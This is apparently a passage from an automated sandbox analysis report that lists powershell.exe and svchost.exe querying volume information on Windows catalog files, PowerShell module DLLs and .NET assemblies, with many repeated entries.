Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
